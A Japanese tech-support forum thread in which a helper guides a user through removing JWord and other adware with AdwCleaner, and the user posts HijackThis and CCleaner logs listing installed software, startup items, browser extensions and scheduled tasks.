Lagarith Lossless Codec (1.3.27) 2014/02/15 1.02 MB
LAME v3.99.3 (for Windows) 2014/02/15 1.52 MB
Lhaplus 2014/11/13
LightCapture I-O DATA DEVICE,INC. 2014/02/12 1.10.0000
LimeChat 2 Satoshi Nakagawa 2014/11/13 2.40
LINE LINE Corporation 2014/11/13 3.7.3.82
Microsoft Age of Empires II 2014/11/13
Microsoft Age of Empires II: The Conquerors Expansion 2014/11/13
Microsoft OneDrive Microsoft Corporation 2015/03/13 30.6 MB 17.3.4726.0226
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2014/08/19 2.69 MB 8.0.59193
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2014/02/12 3.70 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2014/06/30 598 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/10/30 10.2 MB 9.0.30729
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 11.1 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 Microsoft Corporation 2014/11/13 20.5 MB 11.0.60610.1
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 Microsoft Corporation 2014/11/13 17.3 MB 11.0.60610.1
Mozilla Firefox 37.0.1 (x86 ja) Mozilla 2015/04/04 83.5 MB 37.0.1
Mozilla Maintenance Service Mozilla 2015/04/04 391 KB 37.0.1
MyBookEditor4 Asukanet 2015/02/05 46.0 MB 1.3.76
NeoplePlugin 2014/11/13
Niconico Live Encoder niwango, inc. 2014/08/06 2.0.4
OpenSource Flash Video Splitter 1.0.0.5 2014/11/13 1.0.0.5
Pmangインストールマネージャー GameOn,Pmang 2014/11/13 1.0.1.1
Project 64 version 2.1.0.1 2014/11/13 9.64 MB 2.1.0.1
QuickTime 7 Apple Inc. 2014/08/30 70.2 MB 7.75.80.95
RPGツクール2000 ランタイムパッケージ 2014/11/13
RPGツクールVX Ace RTP Enterbrain 2014/03/14 194 MB 1.00
Skype Click to Call Microsoft Corporation 2015/04/04 13.1 MB 7.3.16540.9015
Skype(TM) 7.3 Skype Technologies S.A. 2015/04/04 49.4 MB 7.3.101
SoundEngine Free Coderium 2012/10/31 5.0.0.6
Steam Valve Corporation 2014/11/13
TalesWeaver 2014/12/27
TERA GameOn 2015/02/12 8177808
Update for Japanese Microsoft IME Postal Code Dictionary Microsoft Corporation 2014/11/16 7.60 MB 16.0.1171.1
Update for Japanese Microsoft IME Standard Dictionary Microsoft Corporation 2014/11/16 40.3 MB 16.0.1404.1
Update for Japanese Microsoft IME Standard Extended Dictionary Microsoft Corporation 2014/11/16 11.5 MB 15.0.1215
Update for Japanese Microsoft IME Trending Words Dictionary Microsoft Corporation 2015/01/07 17.0 KB 16.0.1016.1
USB PC Camera (SN9C102) 2014/11/13 4.7.5.0
Ut Video Codec Suite UMEZAWA Takeshi 2013/10/28 1.97 MB 13.3.0
VIA プラットフォーム･デバイス･マネージャ VIA Technologies, Inc. 2012/10/30 2.62 MB 1.39
♪超録 - パソコン長時間録音機 フリーウェア版 2014/11/13
つよきす３学期 INTERHEART 2014/11/13 4.88 GB 1.9
ニコ生デスクトップキャプチャー(XP) SEASON2 Consolas 2012/10/31 1.41 MB 1.15
モンスターハンター フロンティアG CAPCOM CO., LTD. 2014/08/21 1.27.2000
俺たちに翼はないＲ Navel 2014/11/20 Version 1.00
幻想神域 X-Legend 2014/05/16 1.0000

以上です。

ログを拝見いたしました。
Jwordがどうにもしぶとく残っていますね。
こちらはツールで本体を消し去るついでに処置してもらうとしましょう。

以下のソフトウェアをご用意ください。

「AdwCleaner」（通称:AC）
http://www.bleepingcomputer.com/download/adwcleaner/dl/125/
ファイル直リンクです。アクセスしてファイルを分かりやすい場所に保存しておいてください。
ソフトウェアを一度起動させることにより自動的にアップデートが始まります。
アップデートが完了しましたら今は何もせずに終了させてください。
本ソフトウェアの削除指示があった際は起動後に「アンインストール」ボタンを押せば自動で削除されます。

準備できたら作業を開始しましょう。

PCをセーフモードで起動させてください。
ACを起動させ、Scanまたはスキャンをクリックします。
スキャンが終了しましたら、Cleaningまたは除去をクリックして掃除を行います。
掃除が完了すると再起動を求められますので、指示に従って通常モードで再起動を行ってください。
これでセーフモードから通常モードに移行します。
再起動前後いずれかにACのログが表示さますので、分かりやすい場所に保存しておいてください。

その後、CCを起動させてください。
起動したら、「ツール」→「スタートアップ」→「Windows」タブを開いてください。
そこで右下の「テキストとして保存」を押すと、表示の内容がログとして保存できますので、
デスクトップ等、分かりやすい場所に最新のログのみ保存しておきましょう。
続いて「InternetExplorer」タブのログ、導入されておられるのであれば「Firefox」タブ、
同じく導入されておられるのであれば「Google Chrome」タブ、そして「スケジュールされたタスク」タブのログを取得してください。
ただし、「コンテキストメニュー」のログは取得していただく必要がございません。
CCの各ログを取得されましたら、CCは終了させて問題ありません。
HJTのログ、CCのインストール情報ログを再取得してください。
ACとHJTとCCの各ログを返信欄に貼り付けていただき、ご報告をお願いいたします。
上記ログを確認後、次の作業内容をご案内いたします。

作業が終了しましたので以下にログを貼っておきます。
引き続き指示をお願いします。

HJT
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:56:22, on 2015/04/04
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.17416)
Boot mode: Normal

Running processes:
C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
C:\Program Files (x86)\Naver\LINE\Line.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Trend Micro\HiJackThis\HiJackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 9896 bytes

CC

Adobe AIR Adobe Systems Incorporated 2014/11/13 3.6.0.6090
Adobe Flash Media Live Encoder 3.2 Adobe Systems Incorporated 2012/10/31 15.8 MB 3.2.0
Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/02/05 6.00 MB 16.0.0.305
Adobe Reader XI (11.0.10) - Japanese Adobe Systems Incorporated 2015/02/08 206 MB 11.0.10
Age of Empires II: HD Edition Hidden Path Entertainment, Ensemble Studios 2014/11/13
AmaRecTV Live 2014/11/13
AmvVideoCodec 2014/11/13
Apple Application Support Apple Inc. 2014/10/03 93.4 MB 3.0.6
Apple Mobile Device Support Apple Inc. 2014/10/03 21.6 MB 8.0.0.23
Apple Software Update Apple Inc. 2012/10/31 2.38 MB 2.1.3.127
ApplicationManager 2011.4.27.209 kingsoft 2014/11/13 2011.4.27.209
ArcheAge XLGAMES 2014/08/10
ArcheAge GameOn 2014/11/13 1
au Wi-Fi接続ツール 株式会社 ネットビジョン 2014/11/13
CCleaner Piriform 2015/04/04 5.04
Common GameOn 2014/11/13 46603608
Creative システム インフォメーション Creative Technology Limited 2014/11/13 1.10
DAEMON Tools Lite Disc Soft Ltd 2014/11/13 4.49.1.0356
DC-Bass Source 1.3.0 2014/11/13
DirectVobSub 2.40.4209 MPC-HC Team 2014/02/15 2.10 MB 2.40.4209
DivXセットアップ DivX, LLC 2014/11/13 2.6.1.90
eo接続ツール Siemens 2012/10/31 2.0
ffdshow v1.1.4399 [2012-03-22] 2014/02/15 13.5 MB 1.1.4399.0
Gamepot Web実行環境 Gamepot 2012/12/04 308 KB 1.1.0
Google Chrome Google Inc. 2014/05/10 34.0.1847.131
Google 日本語入力 Google Inc. 2014/01/07 83.0 MB 1.13.1641.0
Hangame 2014/11/13
HiJackThis Trend Micro 2013/08/24 369 KB 1.0.0
Hounds DMM 2014/05/10 1.0.0
iFunbox (v2.94.2520.758), iFunbox DevTeam 2015/02/27 23.3 MB v2.94.2520.758
Intel(R) Management Engine Components Intel Corporation 2012/09/20 8.1.0.1281
Intel(R) Processor Graphics Intel Corporation 2012/09/20 9.17.10.2849
Intel(R) SDK for OpenCL - CPU Only Runtime Package Intel Corporation 2014/11/13 2.0.0.37149
iTunes Apple Inc. 2014/10/03 219 MB 11.4.0.18
KDrive kingsoft 2014/11/13 1.21.0.1584
KDriveプラグイン kingsoft 2014/11/13 1.0.0.1
Lagarith Lossless Codec (1.3.27) 2014/02/15 1.02 MB
LAME v3.99.3 (for Windows) 2014/02/15 1.52 MB
Lhaplus 2014/11/13
LightCapture I-O DATA DEVICE,INC. 2014/02/12 1.10.0000
LimeChat 2 Satoshi Nakagawa 2014/11/13 2.40
LINE LINE Corporation 2014/11/13 3.7.3.82
Microsoft Age of Empires II 2014/11/13
Microsoft Age of Empires II: The Conquerors Expansion 2014/11/13
Microsoft OneDrive Microsoft Corporation 2015/03/13 30.6 MB 17.3.4726.0226
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2014/08/19 2.69 MB 8.0.59193
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2014/02/12 3.70 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2014/06/30 598 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/10/30 10.2 MB 9.0.30729
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 11.1 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 Microsoft Corporation 2014/11/13 20.5 MB 11.0.60610.1
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 Microsoft Corporation 2014/11/13 17.3 MB 11.0.60610.1
Mozilla Firefox 37.0.1 (x86 ja) Mozilla 2015/04/04 83.5 MB 37.0.1
Mozilla Maintenance Service Mozilla 2015/04/04 391 KB 37.0.1
MyBookEditor4 Asukanet 2015/02/05 46.0 MB 1.3.76
NeoplePlugin 2014/11/13
Niconico Live Encoder niwango, inc. 2014/08/06 2.0.4
OpenSource Flash Video Splitter 1.0.0.5 2014/11/13 1.0.0.5
Pmangインストールマネージャー GameOn,Pmang 2014/11/13 1.0.1.1
Project 64 version 2.1.0.1 2014/11/13 9.64 MB 2.1.0.1
QuickTime 7 Apple Inc. 2014/08/30 70.2 MB 7.75.80.95
RPGツクール2000 ランタイムパッケージ 2014/11/13
RPGツクールVX Ace RTP Enterbrain 2014/03/14 194 MB 1.00
Skype Click to Call Microsoft Corporation 2015/04/04 13.1 MB 7.3.16540.9015
Skype(TM) 7.3 Skype Technologies S.A. 2015/04/04 49.4 MB 7.3.101
SoundEngine Free Coderium 2012/10/31 5.0.0.6
Steam Valve Corporation 2014/11/13
TalesWeaver 2014/12/27
TERA GameOn 2015/02/12 8177808
Update for Japanese Microsoft IME Postal Code Dictionary Microsoft Corporation 2014/11/16 7.60 MB 16.0.1171.1
Update for Japanese Microsoft IME Standard Dictionary Microsoft Corporation 2014/11/16 40.3 MB 16.0.1404.1
Update for Japanese Microsoft IME Standard Extended Dictionary Microsoft Corporation 2014/11/16 11.5 MB 15.0.1215
Update for Japanese Microsoft IME Trending Words Dictionary Microsoft Corporation 2015/01/07 17.0 KB 16.0.1016.1
USB PC Camera (SN9C102) 2014/11/13 4.7.5.0
Ut Video Codec Suite UMEZAWA Takeshi 2013/10/28 1.97 MB 13.3.0
VIA プラットフォーム･デバイス･マネージャ VIA Technologies, Inc. 2012/10/30 2.62 MB 1.39
♪超録 - パソコン長時間録音機 フリーウェア版 2014/11/13
つよきす３学期 INTERHEART 2014/11/13 4.88 GB 1.9
ニコ生デスクトップキャプチャー(XP) SEASON2 Consolas 2012/10/31 1.41 MB 1.15
モンスターハンター フロンティアG CAPCOM CO., LTD. 2014/08/21 1.27.2000
俺たちに翼はないＲ Navel 2014/11/20 Version 1.00
幻想神域 X-Legend 2014/05/16 1.0000


AC「Windows」

有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Helper SaverExxtensiion C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.x64.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Helper TakeTHeCoupon C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.x64.dll


AC「Firefox」
有効 Extension AAlllSaveer 1.4 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\Rw@pKVf9.net
有効 Extension DaigiCoupon 5.3 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\QoDQ@B.com
有効 Extension HGPlugin 1.1.0.0 NHN PlayArt default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\hgplugin@hangame.co.jp
有効 Extension Skype Click to Call 7.3.16540.9015 Microsoft Corporation default Firefox 37.0.1 c:\program files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi
有効 Extension UnIDealsi 2.0 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\KyK6@ymFhfOn.org
有効 Extension youtubeadblocker 1.0 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\sK8@H4N8xo.org
有効 Plugin Adobe Acrobat 11.0.10.32 Adobe Systems Inc. default Firefox 37.0.1 C:\Program Files (x86)\Adobe\Reader 11.0\Reader\browser\nppdf32.dll
有効 Plugin DivX VOD Helper Plug-in 1.1.0.12 DivX, LLC. default Firefox 37.0.1 C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll
有効 Plugin Gamepot Execution Environment 1.0.0.3 Gamepot Inc. default Firefox 37.0.1 C:\Program Files (x86)\Gamepot\GPEXE\npGPEXE.dll
有効 Plugin Google Update 1.3.22.3 Google Inc. default Firefox 37.0.1 C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll
有効 Plugin Intel® Identity Protection Technology 2.1.42.0 Intel Corporation default Firefox 37.0.1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
有効 Plugin Intel® Identity Protection Technology 2.1.42.0 Intel Corporation default Firefox 37.0.1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
有効 Plugin iTunes Application Detector 1.0.1.1 Apple Inc. default Firefox 37.0.1 C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
有効 Plugin neople game installer for firefox 1.0.0.17 default Firefox 37.0.1 C:\ProgramData\NeoplePlugin\npNeopleGameInstaller.dll
有効 Plugin Nexon Game Controller 1.0.1.4 Nexon default Firefox 37.0.1 C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin pmangsupport 1.0.0.1 default Firefox 37.0.1 C:\Users\ryota\Desktop\譁ｰ縺励＞繝輔か繝ｫ繝€繝ｼ\GameOn\TERA\nppmangsupport.dll
有効 Plugin QuickTime Plug-in 7.7.5 7.7.5.0 Apple Inc. default Firefox 37.0.1 C:\Program Files (x86)\QuickTime\Plugins\npqtplugin5.dll
有効 Plugin Shockwave Flash 16.0.0.305 Adobe Systems Incorporated default Firefox 37.0.1 C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll

AC「GoogleChorome」
有効 App Gmail 8.1 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.30 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0
有効 App Google ドライブ 6.4 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0
有効 App YouTube 4.2.7 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0
有効 Extension BlocKUTubEADi 3.2 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\geoafhlnmffijlblgohnpmjfbnpcpadd\3.2_0
有効 Extension Dropmark sidebar 171 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\foiapgoppijipmmgkaibacckkhbngfhp\171
有効 Extension Google ドキュメント 0.9 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0
有効 Extension Twitch Stream 207 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjaicoojlfoococemdcaollmhaiolole\207

スケジュールされたタスク
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task avaavxvyex C:\Users\ryota\AppData\Local\avaavxvyex\avaavxvyex.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task Lyrics-Fan Update C:\Program Files (x86)\Lyrics_Fan\lrcsfans.exe /c
有効 Task Microsoft OneDrive Auto Update Task-S-1-5-21-1488747381-3182991089-3951260014-1001 Microsoft Corporation %localappdata%\Microsoft\OneDrive\OneDrive.exe
無効 Task Optimize Start Menu Cache Files-S-1-5-21-1488747381-3182991089-3951260014-1001
有効 Task {0601D1B3-F740-46AF-A550-6AFEBF819572} Microsoft Corporation C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\TKFE\ihs.exe" -c -dir "C:\Program Files (x86)\TKFE\"
有効 Task {1A2DB53E-8396-41D2-8361-E87074E12D6F} Mozilla Corporation "c:\program files (x86)\mozilla firefox\firefox.exe" http://ui.skype.com/ui/0/6.3.0.107/ja/abandoninstall?page=tsProgressBar
有効 Task {9BC57B91-65D9-4D7E-9148-846ED936F68B} Microsoft Corporation C:\Windows\system32\pcalua.exe -a C:\Users\ryota\Desktop\Project64KVE\Project64KVE.exe -d C:\Users\ryota\Desktop\Project64KVE

以上です。

HJTとCCのログはすべてご提示いただいておりますが、ACのログがまだのようです。
ACの駆除ログのご提示をお願いいたします。

すみません。思い違いで貼り忘れていました。
以下がACのログです。

